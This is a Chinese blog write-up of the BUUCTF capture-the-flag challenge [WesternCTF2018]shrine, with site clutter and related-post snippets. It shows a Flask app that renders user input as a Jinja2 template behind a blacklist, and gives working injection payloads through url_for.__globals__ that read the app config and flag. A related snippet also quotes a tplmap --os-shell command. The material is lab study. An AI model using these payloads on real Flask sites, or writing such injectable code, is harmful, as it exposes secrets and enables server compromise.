BUUCTF:[WesternCTF2018]shrine

最新推荐文章于 2022-05-05 17:41:15 发布
最新推荐文章于 2022-05-05 17:41:15 发布
阅读量256 收藏
点赞数
分类专栏: CTF_Web_Writeup BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/111992304
版权

打开网页是一题代码审计


import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

题目中存在着两个路由,第一个是展示源代码,另一个是在/shrine/路径下提交参数,通过模板{{}}设定的参数提交到后端,没错,这就是模板注入。先尝试输入参数{{7*7}}
在这里插入图片描述
因为config和self被过滤所以没法直接看
在这里插入图片描述
如果没有黑名单的时候,我们可以使用config,传入 config,或者使用self传入 {{self.dict}}
但是python中还是存在着一些内置函数的比如url_for和get_flashed_messages
利用payload找到当前使用的app

shrine%2f{{url_for.__globals__}}

在这里插入图片描述
读取当前app下config得到flag

/shrine/{{url_for.__globals__['current_app'].config}}

在这里插入图片描述
flag:

flag{50ec3157-e116-4b8d-8fe0-75510f45657f}
FW_ENJOEY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1416
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
[WesternCTF2018]shrine
qq_43801002的博客
07-31 1943
题目 过程 1.使用tplmap,发现有ssti注入 ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' 2.题目源码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).re
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 259
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
[WesternCTF2018]shrine 1
shinygod的博客
03-21 1532
知识点:flask的ssti 把它排一下(可以在pycharm按ctrl+alt+L然后再调调就好了) import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #使不知道哪的FLAG赋值给当前app的配置变量FLAG #应该需要我们拿到config的FLAG值 @app.route('/') def index(): return open(__file__)
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
react-mobx-boilerplate::shinto_shrine:React + MobX样板
05-02
Reactmobx样板 @ghostrick的React + MobX样板 :hugging_face: React 手机 离子子 网页包 流型 埃斯林特 重新组成 启动开发服务器 $ yarn install $ yarn serve 剧本 $ yarn typecheck # ...$ yarn lint # run eslint
ninja-challenge:on关于JS安全竞赛的一些想法:shinto_shrine:
05-15
此回购包含一些想法通过地图又名上的问题 ,由1-隐藏罩问题以最少的字符数编写与以下代码相同的代码: function seq ( ȶȑ ) { var ˠビ= 0 , ˡɃ = ˠビ,ヘɍ = '' , ɀʶ = 10 , ӷベ= ˡɃ + 1 , ȱˁ = '...
bundled-nest::collision:Nest:Japanese_symbol_for_beginner:Webpack:Japanese_symbol_for_beginner:Docker:collision:---:Japanese_castle:现在存档以供历史参考:shinto_shrine:
05-26
:collision: 巢 :Japanese_symbol_for_beginner: Webpack :Japanese_symbol_for_beginner: 码头工人 :collision: :Japanese_castle: 现在存档以供历史参考 :shinto_shrine: 我们得出的结论是,建议不要捆绑NestJS,...
短语手册::shinto_shrine:100%免费的日语短语手册应用程序,专为旅行和离线使用而构建。 将其添加到主屏幕并在19个主题中访问670多个基本短语。 不需要互联网连接并提供语音合成,因此您知道如何正确发音日语短语
02-05
:shinto_shrine: 100%免费的日语短语手册应用程序,专为旅行和离线使用而构建。 将其添加到主屏幕并在19个主题中访问670多个基本短语。 不需要互联网连接并提供语音合成,因此您知道如何正确发音日语短语。 贡献...
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2450
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
BUUCTF】[WesternCTF2018]shrine
aoao331198的博客
05-05 609
源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s):
BUU-WEB-[WesternCTF2018]shrine
qq_24033605的博客
05-16 191
[WesternCTF2018]shrine flask框架审计。 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
【学习笔记18】buu [WesternCTF2018]shrine
weixin_43553654的博客
05-18 408
打开网站,查看源码看到下面的一串代码 import flask//flask模板,首先就想到了想到了之前我写的一篇flask模板ssti逃逸 import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,这里基本可以确定是flag。 @app.route('...
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
BUUCTF [WesternCTF2018] shrine
Senimo
12-16 468
BUUCTF [WesternCTF2018] shrine 考点: Flask模版注入 url_for()和get_flashed_messages()函数绕过黑名单 __globals__、__dict__等变量含义 启动环境: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op
[BUUCTF]第七天训练日志
Y4tacker的博客
10-10 3764
[SUCTF 2019]EasyWeb suctf2019 bypass open_basedir的新方法 阿姨熄灯了睡觉
BUUCTF—WEB-WarmUp
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
buuctf [HCTF 2018]admin(flask cookie伪造)
qq_44111753的博客
01-02 1055
知识点 1、flask cookie伪造 2、flask中的SECRET_ KEY值作用 Flask、Django的 secret key 设置有什么用? SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用其名所示,加密的强度取决于变量值的机密度.不同的程序要使用不同的密钥,而且要保证其他人不知道你所用的字符串,SECRET_KEY的作用主要是提供一个值做各种HASH,主要的作用应该是在其加密过程中作为算法的一个参数(salt或其他).所以这个值的复杂度也就影响到了数据传输和存储

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值